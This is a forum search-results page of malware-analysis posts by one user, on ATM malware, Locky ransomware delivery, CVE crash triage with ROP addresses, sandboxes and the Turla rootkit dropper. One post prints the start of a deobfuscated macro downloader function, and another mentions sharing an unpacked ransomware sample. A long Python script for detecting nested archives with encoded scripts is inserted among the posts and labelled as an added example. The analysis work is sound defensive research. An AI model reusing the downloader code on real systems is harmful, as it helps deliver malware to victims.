Search found 73 matches

by frank_boldewin
Tue Jul 24, 2018 9:48 am
Forum: Malware
Topic: ATM Malware JackPot v2
Replies: 7
Views: 5287

Re: ATM Malware JackPot v2

Does the sample work for you?
On my machines it always crashes.
by frank_boldewin
Wed May 11, 2016 7:39 pm
Forum: Malware
Topic: Locky ransomware
Replies: 142
Views: 203099

Re: Locky ransomware

Just analysed a new way Locky tries to install on systems: very small zip files (<1000 bytes); after unzipping there's a rar file, and inside that one a .vbe (encrypted .vbs file). The .vbs file tries to download and run a Locky dropper. Several AV scanners are bad at detecting this. Encrypted .vbe file '**...
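A triage helper for the delivery chain described in the post above (tiny zip, nested archive, encoded script). This is an added example, not code from the post or from any Locky sample: it classifies archive members by content (RAR and zip magic bytes, the `#@~^` marker that Microsoft Script Encoder output starts with) rather than by file extension, so a renamed .vbe is still flagged. Because the standard library cannot build RAR archives, the constructed sample nests a zip in place of the rar; the RAR check still runs on real input. The threshold of 1000 bytes, the member names and the finding labels are assumptions chosen for illustration.

```python
"""Triage a small archive attachment for the zip -> archive -> .vbe pattern.

Added example; it is not part of the original forum post. Detection is by
content (magic bytes / Script Encoder marker), with the extension only as a
secondary signal.
"""
import io
import zipfile

RAR_MAGIC = b"Rar!\x1a\x07"         # first six bytes shared by RAR 4.x and RAR5 signatures
ZIP_MAGIC = b"PK\x03\x04"           # local file header of a zip
VBE_MARKER = b"#@~^"                # start marker of Microsoft Script Encoder output (.vbe/.jse)
SMALL_ZIP_THRESHOLD = 1000          # bytes; matches the "<1000 Bytes" observation (assumed cut-off)
SUSPICIOUS_EXT = (".vbe", ".vbs", ".jse", ".js", ".wsf")


def classify_member(name, data):
    """Return a list of findings for one archive member, judged by its content first."""
    findings = []
    if data.startswith(RAR_MAGIC):
        findings.append("nested-rar")
    elif data.startswith(ZIP_MAGIC):
        findings.append("nested-zip")
    if data.startswith(VBE_MARKER):
        findings.append("script-encoder")   # encoded script, whatever the extension says
    if name.lower().endswith(SUSPICIOUS_EXT):
        findings.append("script-ext")
    return findings


def triage_zip(blob, depth=0, max_depth=3):
    """Walk a zip (recursing into nested zips) and report findings per member path."""
    report = {}
    if depth == 0 and len(blob) < SMALL_ZIP_THRESHOLD:
        report["<outer>"] = ["tiny-zip"]
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            findings = classify_member(info.filename, data)
            if "nested-zip" in findings and depth < max_depth:
                for path, inner_findings in triage_zip(data, depth + 1, max_depth).items():
                    report[f"{info.filename}/{path}"] = inner_findings
            if findings:
                report[info.filename] = findings
    return report


def is_suspicious(report):
    """Nested archive plus an encoded script anywhere inside is the pattern we care about."""
    flags = {f for fs in report.values() for f in fs}
    return bool({"nested-rar", "nested-zip"} & flags) and "script-encoder" in flags


def build_sample():
    """Constructed sample (not a real Locky attachment): zip -> zip -> fake .vbe.

    The inner zip stands in for the rar from the post, since the standard
    library cannot write RAR archives.
    """
    vbe = VBE_MARKER + b"encoded-script-body-goes-here==^#~@"
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.vbe", vbe)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("invoice.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    sample = build_sample()
    result = triage_zip(sample)
    for path, findings in result.items():
        print(f"{path}: {', '.join(findings)}")
    print("suspicious:", is_suspicious(result))
```

The report keys are member paths joined with `/`, so a nested hit is traceable to the archive it came from; `max_depth` guards against zip bombs built as deep recursion.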
by frank_boldewin
Wed Feb 24, 2016 2:14 pm
Forum: Malware
Topic: Locky ransomware
Replies: 142
Views: 203099

Re: Locky ransomware

Just in case one is interested: attached is an unpacked version of Locky.
by frank_boldewin
Tue Feb 23, 2016 4:23 pm
Forum: Malware
Topic: Locky ransomware
Replies: 142
Views: 203099

Re: Locky ransomware

Seems like it stopped working. Servers taken down? maddog4012's doc file starts a macro with some obfuscated VB code that decodes to the following code: function downloadToFile(url,file) { var xhr=new ActiveXObject("msxml2.xmlhttp"); ado=new ActiveXObject("ADODB.Stream"); xhr.open("GET",url,false); xhr.s...
by frank_boldewin
Fri Aug 07, 2015 10:14 am
Forum: Tools/Software
Topic: [2017-11-05]ARK for Windows X64: WIN64AST(Page10#96)
Replies: 98
Views: 349216

Re: [2015-08-04]ARK for Windows x64: WIN64AST(Page8#78)

I like your tool, though some features are badly missing:

complete process + driver dump incl. PE fixing
memory map (VAD) view for processes including page protections, as well as dumping individual pages.
by frank_boldewin
Mon Jan 26, 2015 8:13 am
Forum: Malware
Topic: CVE-2015-0311
Replies: 15
Views: 13124

Re: CVE-2015-0311

Does one of these samples trigger something on your site?
by frank_boldewin
Sat Dec 13, 2014 4:42 pm
Forum: Malware
Topic: Automated Malware Environments
Replies: 12
Views: 9770

Re: Automated Malware Environments

Cuckoo supports VBOX, VMWARE and QEMU KVM. Furthermore, it has support for Volatility. The latest version has a branch with a new API monitor, which will be integrated into the master branch in the near future. Another plugin is zer0m0n from conix-security, which supports kernel hooks and some anti-VM stuff. And ye...
by frank_boldewin
Fri Apr 04, 2014 1:44 pm
Forum: Malware
Topic: CVE-2014-1761
Replies: 11
Views: 7202

Re: CVE-2014-1761

Sample tested on Windows 7 en - Office 2007 SP3 ---> crash. From the stack rewind we can see it triggered the bug and jumped to the first ROP call at 0x275a48e8 (RET at 0x275a48f6), and that a function in wwlib.dll seems to be the source of the bug. 0:000> kb ChildEBP RetAddr Args to Child WARNING: Fr...
by frank_boldewin
Mon Mar 03, 2014 5:29 pm
Forum: Malware
Topic: WinNT/Turla (WinNT/Pfinet, Uroburos rootkit)
Replies: 66
Views: 255863

Re: Uroburos rootkit

Yesterday I wrote on Facebook that the Uroboros malware reminds me of a similar case back in 2008. Now I'm pretty sure. When the dropper executes, it first checks whether it runs on a 32-bit or 64-bit system to select which driver to drop later. It creates a directory $NtUninstallQ817473 inside the windows d...